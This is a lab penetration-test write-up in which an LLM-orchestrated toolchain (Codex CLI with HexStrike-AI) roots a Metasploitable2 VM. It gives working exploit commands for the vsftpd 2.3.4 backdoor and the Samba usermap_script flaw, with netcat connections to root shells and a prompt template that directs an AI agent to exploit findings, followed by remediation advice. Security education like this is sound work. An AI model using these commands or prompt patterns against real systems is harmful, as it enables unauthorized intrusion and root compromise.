HexStrike+OpenAI Codex. AI-Driven Exploitation of Metasploitable.

Ecosystem Fit

This page mirrors the original Medium article into the 1200km.com Docusaurus ecosystem. The original article flow, images, screenshots, infographics, and technical blocks are preserved from the export.

How I Used an LLM-Orchestrated Toolchain to Enumerate and Exploit a Deliberately Vulnerable Host (With Real Proofs)

Introduction

AI-assisted penetration testing is no longer a concept — it is operational reality.

In this article, I walk through a real, authorized penetration test against my own lab host running Metasploitable2. I used an LLM-driven workflow (Codex CLI) orchestrating tool execution through HexStrike-AI to perform:

  • network discovery

  • enumeration and service fingerprinting

  • exploit selection and execution

  • proof collection (root-level command output)

This was not a simulation.

Real tools were executed. Real vulnerabilities were validated. And the target was compromised with unauthenticated root access twice, via two independent attack paths.

Core Guides and Setup

HexStrike on Kali Linux 2025.4: A Comprehensive Guide

  • Focus: Initial setup and overview of the AI-powered offensive security framework.

HexStrike-AI: A Force Multiplier for Red Teams — and a Dangerous Shift in the Threat Landscape

  • Focus: Analysis of AI-orchestrated pentesting and its implications.

HexStrike MCP Orchestration with Ollama: Ubuntu Host, Kali VM, SSH Bridging, and Performance…

  • Focus: Technical architecture using Model Context Protocol (MCP) and local LLMs.

Practical Applications & Lab Comparisons

HexStrike + Gemini vs. HackerAI: “Ops Copilot” vs. “Chatbot with Tools”

  • Focus: Practical lab comparison of orchestration quality between different AI security tools.

AI-Driven Pentesting at Home: Using HexStrike-AI for Full Network Discovery and Exploitation

  • Focus: Step-by-step home lab application for network enumeration.

What Is HexStrike-AI?

HexStrike-AI is not “another scanner.”

It is an orchestration layer that lets an LLM:

  • decide what security tools to run

  • execute them locally (or via SSH/MCP)

  • interpret outputs

  • adapt strategy dynamically (timeouts, missing tools, privilege constraints)

  • optionally run controlled exploitation with PoC evidence

In short:

The AI plans. HexStrike executes. Kali delivers the tools.

Test Scope & Authorization

This assessment was conducted under explicit authorization.

Scope

  • Target: 172.16.163.129

  • Environment: private home lab (Metasploitable2 VM)

  • Attacker: Kali Linux environment with Codex CLI + HexStrike MCP
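
A scope statement like this can also be enforced mechanically before any tool runs. The sketch below is a minimal illustration, assuming a hypothetical allowlist variable `SCOPE_HOSTS` and a hypothetical helper `in_scope`; neither is part of HexStrike or Codex CLI.

```shell
# Hypothetical allowlist of authorized targets (space-separated).
# This is an illustration, not a HexStrike or Codex CLI setting.
SCOPE_HOSTS="172.16.163.129"

# in_scope HOST: succeeds only if HOST exactly matches an allowlisted address.
in_scope() {
    for allowed in $SCOPE_HOSTS; do
        [ "$1" = "$allowed" ] && return 0
    done
    return 1
}

# An address outside the allowlist is rejected before anything is scanned.
in_scope 172.16.59.129 || echo "172.16.59.129 is out of scope"
```

Calling `in_scope "$target" || exit 1` at the top of a wrapper script is one way to make a mistyped address fail loudly instead of scanning the wrong host.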

The Prompt That Started Everything

This is the “pattern” that makes LLM-driven pentesting actually work: you must demand execution and evidence.

Example prompt structure (adapt it to your CLI):

    Use the MCP server "hexstrike": Authorized pentest of 172.16.163.129
    Full service discovery
    Enumerate versions
    Identify vulnerabilities (by severity)
    Exploit critical findings
    Provide proofs (command output)

Key lesson: If you want HexStrike to run tools, explicitly require tool execution and proof artifacts.
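
To reuse the same structure across targets, the prompt can be generated from a template. This is only a sketch: the function name `build_prompt` is made up for illustration, and how the text reaches your LLM CLI is deliberately left open because that depends on the tool.

```shell
# build_prompt TARGET: prints the prompt text for one authorized target.
# Hypothetical helper; it only produces text and runs nothing.
build_prompt() {
    cat <<EOF
Use the MCP server "hexstrike": Authorized pentest of $1
Full service discovery
Enumerate versions
Identify vulnerabilities (by severity)
Exploit critical findings
Provide proofs (command output)
EOF
}

build_prompt 172.16.163.129
```

Keeping the execution and proof lines in the template means they cannot be forgotten when the target changes.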

Phase 1: Reachability and Discovery

The first attempt targeted the wrong IP (172.16.59.129) and returned “host seems down.”

Once the target was corrected to 172.16.163.129, the host responded immediately.

A fast top-ports discovery scan confirmed the target was up and exposed a broad attack surface.

Phase 2: Enumeration & Service Fingerprinting

Because the environment had constraints (root privileges not always available, tool timeouts), the workflow adapted:

  • switched from SYN scan (-sS) to TCP connect (-sT)

  • used bounded host timeouts

  • reduced version intensity when needed
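
The adaptations above map onto standard nmap options. The sketch below shows one way to pick between them; the helper name `build_scan_cmd` and the specific timeout, intensity, and port-count values are assumptions for illustration, not the values from the original run. It prints the command rather than running it.

```shell
# build_scan_cmd TARGET [UID]: prints (does not run) an nmap command line.
# UID defaults to the current user's ID. The numeric values are illustrative.
build_scan_cmd() {
    scan_uid="${2:-$(id -u)}"
    if [ "$scan_uid" -eq 0 ]; then
        scan_type="-sS"   # SYN scan needs raw-socket privileges
    else
        scan_type="-sT"   # TCP connect scan works without root
    fi
    # --host-timeout bounds time per host; --version-intensity (0-9) trades
    # fingerprint depth for speed.
    echo "nmap $scan_type -sV --version-intensity 2 --host-timeout 120s --top-ports 1000 $1"
}

build_scan_cmd 172.16.163.129 1000
```

Passing the user ID as an argument keeps the privilege decision visible and easy to check without actually scanning anything.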

Confirmed exposed services (high-level)

The target exposed multiple legacy services typical of Metasploitable2:

  • FTP (21)

  • SSH (22)

  • Telnet (23)

  • SMTP (25)

  • DNS (53)

  • HTTP (80)

  • RPCbind (111)

  • SMB (139/445)

  • rlogin/rsh (513/514)

  • NFS (2049)

  • FTP alt (2121)

  • MySQL (3306)

  • PostgreSQL (5432)

  • VNC (5900)

  • X11 (6000)

  • AJP (8009)
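
A list like this can be pulled out of scan results automatically. The following sketch assumes the scan was saved in nmap's grepable format (`-oG`), which the article does not state; the helper name `open_ports` and the sample line (using a documentation address) are made up for illustration and are not captured output.

```shell
# open_ports: reads nmap grepable (-oG) output on stdin and prints
# "port service" for every port reported as open.
open_ports() {
    awk -F'Ports: ' '/Ports: / {
        n = split($2, entries, ", ")
        for (i = 1; i <= n; i++) {
            # Each entry looks like: port/state/protocol/owner/service/rpc/version/
            split(entries[i], f, "/")
            if (f[2] == "open") print f[1], f[5]
        }
    }'
}

# Synthetic sample line, not output from the test in this article.
printf 'Host: 192.0.2.10 ()\tPorts: 21/open/tcp//ftp///, 23/closed/tcp//telnet///, 22/open/tcp//ssh///\n' | open_ports
```

In practice the input would come from a file, for example `open_ports < scan.gnmap`, where `scan.gnmap` is whatever path was given to `-oG`.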

Host identity confirmation

The HTTP landing page provided a definitive marker:

    curl -s http://172.16.163.129:80 | head -n 5

Output included:

  • <title>Metasploitable2 - Linux</title>

At this point, the test shifted from “general assessment” to “known vulnerable image validation” — meaning we should expect multiple published RCE paths.
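
The title check can be scripted so the identification step leaves a yes/no result. This is a minimal sketch with hypothetical helper names (`extract_title`, `is_metasploitable2`); it handles a title that opens and closes on one line and is not a general HTML parser.

```shell
# extract_title: reads HTML on stdin and prints the text of the first
# <title> element that opens and closes on a single line.
extract_title() {
    sed -n 's/.*<title>\(.*\)<\/title>.*/\1/p' | head -n 1
}

# is_metasploitable2: succeeds if the page title starts with "Metasploitable2".
is_metasploitable2() {
    extract_title | grep -q '^Metasploitable2'
}

printf '<html><head><title>Metasploitable2 - Linux</title></head>\n' | extract_title
```

Against the lab host this would be used as `curl -s http://172.16.163.129:80 | is_metasploitable2 && echo "known vulnerable image"`.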

Phase 3: Vulnerability Discovery (What Stood Out Immediately)

Two services were immediate critical flags due to known RCE history in this lab image:

  • vsftpd 2.3.4 (commonly backdoored in lab builds)

  • Samba 3.0.20 (classic usermap_script RCE path)

Rather than listing every CVE possible for every old service, the workflow focused on:

  • vulnerabilities with direct, reliable exploitability

  • minimal risk of destabilizing the host

  • clear PoC output validation
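
That triage can be approximated with a short lookup over fingerprinted versions. The sketch below is illustrative only: the helper name `flag_critical` and the "service version" input format are assumptions, and the table holds just the two findings and CVE IDs covered in this article.

```shell
# flag_critical: reads "service version" lines on stdin and prints the ones
# matching the two critical findings in this article, with the CVE ID.
flag_critical() {
    while read -r service version; do
        case "$service $version" in
            "vsftpd 2.3.4")  echo "CRITICAL $service $version CVE-2011-2523" ;;
            "samba 3.0.20"*) echo "CRITICAL $service $version CVE-2007-2447" ;;
        esac
    done
}

# "exampled 1.0" is a made-up, non-matching entry.
printf 'vsftpd 2.3.4\nexampled 1.0\nsamba 3.0.20\n' | flag_critical
```

A short, explicit table like this keeps the focus on findings with a reliable exploitation path rather than every CVE an old banner could match.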

Phase 4: Exploitation (With Proofs)

Exploit #1: vsftpd 2.3.4 backdoor (CVE-2011-2523) → Root

Why it worked

In the Metasploitable2 build, vsftpd is intentionally vulnerable. A crafted username containing :) triggers a backdoor listener (commonly on TCP/6200).

Step A — Trigger the backdoor

    (printf "USER test:)\r\nPASS test\r\nQUIT\r\n"; sleep 1) | nc -nv -w 2 172.16.163.129 21

This confirmed:

  • FTP reachable

  • banner: 220 (vsFTPd 2.3.4)
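
The banner check can be turned into an explicit test on the captured FTP output. This is a sketch with a hypothetical helper name, `is_vsftpd_234`. A matching banner only indicates the version; whether the backdoor is present is confirmed by the next step.

```shell
# is_vsftpd_234: reads FTP server output on stdin and succeeds if any line
# is the 220 greeting reported by vsftpd 2.3.4.
is_vsftpd_234() {
    # FTP lines end in CRLF, so strip carriage returns before matching.
    tr -d '\r' | grep -q '^220 (vsFTPd 2\.3\.4)$'
}

printf '220 (vsFTPd 2.3.4)\r\n' | is_vsftpd_234 && echo "banner matches vsftpd 2.3.4"
```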

Step B — Connect to backdoor shell and capture proof

    printf "id\nuname -a\nwhoami\npwd\n" | nc -nv -w 3 172.16.163.129 6200

Proof (captured output):

    uid=0(root) gid=0(root)
    Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
    root
    /

Impact: Unauthenticated Remote Code Execution → root.
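
When proofs are collected by a script, the root claim can be checked against the captured text instead of by eye. A minimal sketch, assuming the output of the proof commands is piped in or saved to a file; the helper name `is_root_proof` is hypothetical.

```shell
# is_root_proof: reads captured shell output on stdin and succeeds if the
# output of `id` reports uid 0.
is_root_proof() {
    grep -q '^uid=0(root)'
}

printf 'uid=0(root) gid=0(root)\nroot\n/\n' | is_root_proof && echo "root shell confirmed"
```

The same check applies to any shell obtained later in the test, since the proof commands are identical.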

No persistence was deployed. No further actions were taken.

Exploit #2: Samba usermap_script (CVE-2007-2447) → Root bind shell

Why it worked

Samba 3.0.20 has a well-known remote command execution vulnerability via the username map script feature. Metasploit automates exploitation.

Tooling nuance: why a bind shell was used

The first Metasploit run produced unstable command shell behavior (sessions closing quickly and command execution differences between session types). The workflow pivoted to a bind shell payload, which is often more reliable in constrained environments.

Step A — Launch exploit with bind netcat payload (binds on port 4446)

    msfconsole -q -x "use exploit/multi/samba/usermap_script; \
    set RHOSTS 172.16.163.129; set RPORT 139; \
    set payload cmd/unix/bind_netcat; \
    set LPORT 4446; set DisablePayloadHandler true; \
    exploit -z; exit -y"
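
The same command sequence can also live in a Metasploit resource script, which avoids shell quoting altogether. The sketch below writes one; the function name `write_usermap_rc` and the file path are illustrative, and the commands are exactly those from the one-liner above.

```shell
# write_usermap_rc FILE: writes a resource script with the same commands
# as the one-liner above.
write_usermap_rc() {
    cat > "$1" <<'EOF'
use exploit/multi/samba/usermap_script
set RHOSTS 172.16.163.129
set RPORT 139
set payload cmd/unix/bind_netcat
set LPORT 4446
set DisablePayloadHandler true
exploit -z
exit -y
EOF
}

# Illustrative path. In the lab, run it with: msfconsole -q -r <that file>
write_usermap_rc "${TMPDIR:-/tmp}/usermap.rc"
```

A resource file is also easier to keep alongside the proof output as a record of exactly what was executed.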

Step B — Connect to bind shell and capture proof

    printf "id\nuname -a\nwhoami\npwd\n" | nc -nv -w 3 172.16.163.129 4446
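
A bind shell may not be listening the instant the exploit returns. That is an assumption about timing, not something observed in this run. A bounded retry is one way to handle it, sketched below with a hypothetical `retry` helper that takes any command.

```shell
# retry ATTEMPTS DELAY CMD...: runs CMD until it succeeds or ATTEMPTS runs
# have been used, sleeping DELAY seconds between tries.
retry() {
    retry_left="$1"; retry_delay="$2"; shift 2
    while [ "$retry_left" -gt 0 ]; do
        "$@" && return 0
        retry_left=$((retry_left - 1))
        [ "$retry_left" -gt 0 ] && sleep "$retry_delay"
    done
    return 1
}

# Harmless demonstration; a lab use might be (assuming a netcat with -z):
#   retry 5 1 nc -z -w 1 172.16.163.129 4446
retry 3 0 true && echo "command succeeded"
```

Bounding the attempts keeps an automated workflow from hanging when the exploit did not land.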

Proof (captured output):

    uid=0(root) gid=0(root)
    Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
    root
    /

Impact: Unauthenticated Remote Code Execution → root.

Final Results Summary

What was validated

  • Broad service exposure consistent with Metasploitable2

  • Two separate unauthenticated root compromises, each independently sufficient for full takeover:

      • vsftpd backdoor (TCP/6200)

      • Samba usermap_script (bind shell on TCP/4446)

What was intentionally not done

  • No persistence / backdoors

  • No credential harvesting

  • No data collection beyond proof commands

  • No lateral movement testing

This kept the test strictly PoC-focused.

Remediation Recommendations (Real-World Perspective)

Metasploitable2 is intentionally insecure. In real systems, the remediation playbook is clear.

Critical

  • Remove backdoored/vulnerable services immediately

  • Never expose training VMs on networks shared with real assets

  • Enforce segmentation (lab VLAN / host-only networks)

High

  • Remove legacy cleartext and trust-based services:

      • Telnet

      • rsh/rlogin

      • VNC / X11 (unless strictly controlled)

  • Restrict SMB exposure and enforce modern versions/configs
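
On a real Linux host, a quick audit for these legacy listeners can start from the socket table. The sketch below assumes input in the column layout of `ss -tln` (local address in the fourth column) and uses the port numbers listed earlier in this article; the helper name `legacy_listeners` and the sample lines are made up for illustration.

```shell
# legacy_listeners: reads `ss -tln` style output on stdin and prints
# "port service" for listening ports tied to legacy services.
legacy_listeners() {
    awk '$1 == "LISTEN" {
        n = split($4, parts, ":")   # port is the last colon-separated field
        port = parts[n]
        if (port == 23)   print port, "telnet"
        if (port == 513)  print port, "rlogin"
        if (port == 514)  print port, "rsh"
        if (port == 5900) print port, "vnc"
        if (port == 6000) print port, "x11"
    }'
}

# Synthetic sample input; on a real host: ss -tln | legacy_listeners
printf 'State Recv-Q Send-Q Local Address:Port Peer Address:Port\nLISTEN 0 128 0.0.0.0:22 0.0.0.0:*\nLISTEN 0 5 0.0.0.0:23 0.0.0.0:*\nLISTEN 0 5 [::]:514 [::]:*\n' | legacy_listeners
```

An empty result does not prove the services are gone (they may be bound to non-default ports), so treat this as a first pass.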

Medium

  • Disable obsolete crypto (SSLv2) and weak ciphers

  • Remove version banners and harden HTTP stack

  • Restrict AJP to localhost/internal networks only

Low

  • Reduce attack surface: firewall by default, allowlist by source

  • Continuous inventory and exposure monitoring
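
"Firewall by default, allowlist by source" can be expressed as a small rule generator. This is a sketch only: the helper name `allowlist_rules`, the source address (a documentation address), and the ports are assumptions, and the function prints `iptables` commands for review instead of applying them.

```shell
# allowlist_rules SOURCE PORT...: prints (does not run) iptables commands
# that admit SOURCE on the listed TCP ports and drop other inbound traffic.
allowlist_rules() {
    rules_src="$1"; shift
    echo "iptables -A INPUT -i lo -j ACCEPT"
    echo "iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT"
    for port in "$@"; do
        echo "iptables -A INPUT -p tcp -s $rules_src --dport $port -j ACCEPT"
    done
    # Default-deny goes last so the accept rules exist before the policy changes.
    echo "iptables -P INPUT DROP"
}

allowlist_rules 192.0.2.10 22 443
```

Printing the rules first makes it possible to review them, or feed them through change control, before anything touches a live host.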

Why This Matters

This test highlights the real value of AI in offensive workflows:

AI did not “replace” pentesting skills. It amplified them.

The LLM-driven workflow:

  • selected practical next steps

  • adapted to missing tools and privilege constraints

  • pivoted when sessions were unstable

  • still produced clean PoC artifacts

The operator still matters, but the mental overhead drops sharply.

Final Thoughts

HexStrike-AI is not a toy. Used correctly, it behaves like a junior pentester with perfect memory and infinite patience — executing exactly what you instruct and iterating until it gets results.